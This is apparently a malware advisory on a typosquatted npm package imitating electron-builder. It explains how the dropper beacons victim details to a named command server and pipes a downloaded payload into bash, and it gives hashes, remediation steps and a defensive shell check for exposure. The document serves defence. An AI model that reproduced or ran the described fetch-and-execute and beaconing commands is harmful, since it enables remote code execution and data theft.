Malicious package

@403name/electron-buidler (npm)

Malicious code in @403name/electron-buidler (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5547
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall @403name/electron-buidler

What this malware does

On require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations.

First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker.

Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes curl -sSfL <C2>/api/payload/ | /bin/bash via spawn('/bin/sh','-c',...) with & disown to detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6').

The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent.
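A triage check built from the behaviour described above, as an added example (not code from the advisory or from O3 Security): it looks for unpacked copies of the package, lockfile references, and the marker at ~/.cache/.nyx-npm/eb. The function name `check_exposure`, its output labels and its return codes are assumptions of this example.

```shell
#!/bin/sh
# Added example, not O3 Security's tooling. Package name and marker path come
# from the advisory; check_exposure and its output labels are assumptions.
PKG='@403name/electron-buidler'
MARKER_REL='.cache/.nyx-npm/eb'   # marker dropped on require(), per the advisory

# check_exposure HOME_DIR PROJECT_DIR
# Prints one finding per line. Returns 0 = no trace, 1 = package installed or
# locked, 2 = marker present (the dropper passed its macOS/CI gates once).
check_exposure() {
  home_dir=$1
  project=$2
  rc=0

  # 1. Unpacked copies, including nested (non-hoisted) node_modules.
  hits=$(find "$project" -type f \
         -path "*/node_modules/$PKG/package.json" 2>/dev/null)
  if [ -n "$hits" ]; then
    rc=1
    printf '%s\n' "$hits" | while IFS= read -r manifest; do
      ver=$(sed -n 's/.*"version"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' \
            "$manifest" | head -n 1)
      echo "INSTALLED $PKG@${ver:-unknown} ($manifest)"
    done
  fi

  # 2. Lockfile references: the package would return on the next install.
  for lock in package-lock.json npm-shrinkwrap.json yarn.lock pnpm-lock.yaml; do
    if [ -f "$project/$lock" ] && grep -qF -- "$PKG" "$project/$lock"; then
      echo "LOCKED $PKG referenced in $project/$lock"
      rc=1
    fi
  done

  # 3. Marker: -e matches whether "eb" is a file or a directory.
  if [ -e "$home_dir/$MARKER_REL" ]; then
    echo "EXECUTED marker $home_dir/$MARKER_REL exists"
    rc=2
  fi
  return "$rc"
}

# Usage: check_exposure "$HOME" /path/to/project
```

A return code of 2 means index.js ran under that account, so the credential rotation above applies even if the package has since been uninstalled.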

Malicious versions

2 flagged
1.0.0, 1.0.1

Indicators of compromise (SHA-256)

6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4
bf81a596bee9d4858a18bd26f5037bfdab52f11400c3590dc8b99b6e3e1daa53

Frequently asked questions

No. @403name/electron-buidler on npm has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005449, IN-MAL-2026-005452

Credits

  • Amazon Inspector · finder

@403name/electron-buidler (npm) malicious package — MAL-2026-5547 | O3 Security